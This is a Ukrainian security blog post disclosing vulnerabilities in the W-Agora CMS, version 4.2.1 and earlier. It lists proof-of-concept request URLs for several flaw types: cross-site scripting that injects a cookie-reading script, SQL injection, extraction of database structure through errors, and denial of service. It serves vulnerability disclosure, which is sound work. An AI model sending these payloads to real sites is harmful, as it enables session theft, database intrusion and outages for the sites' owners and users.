Численні уразливості в W-Agora

15:06 25.12.2010

30.10.2010

У серпні, 29.08.2010, я знайшов численні уразливості в W-Agora (це система веб публікації, тобто по суті CMS) - Cross-Site Scripting, SQL DB Structure Extraction, SQL Injection та Denial of Service уразливості. Які я виявив на офіційноу сайті w-agora.net. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.12.2010

XSS:

http://site/current/search.php?bn=support_news&search_forum='%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=support&gosearch=1

SQL DB Structure Extraction:

http://site/current/search.php?bn=support_news&search_forum='&site=support&gosearch=1

SQL Injection:

http://site/current/search.php?bn=support_news&search_forum='%20or%20version()%3E'5&site=support&gosearch=1

DoS:

http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=%25
http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=
http://site/current/list.php?site=support&bn=support_news

Уразливі W-Agora 4.2.1 та попередні версії.

This entry was posted on 15:06 25.12.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

You must be logged in to post a comment.

Websecurity - Веб безпека

Численні уразливості в W-Agora

Leave a Reply

Меню

Категорії

Останні повідомлення

Архів +-

Мета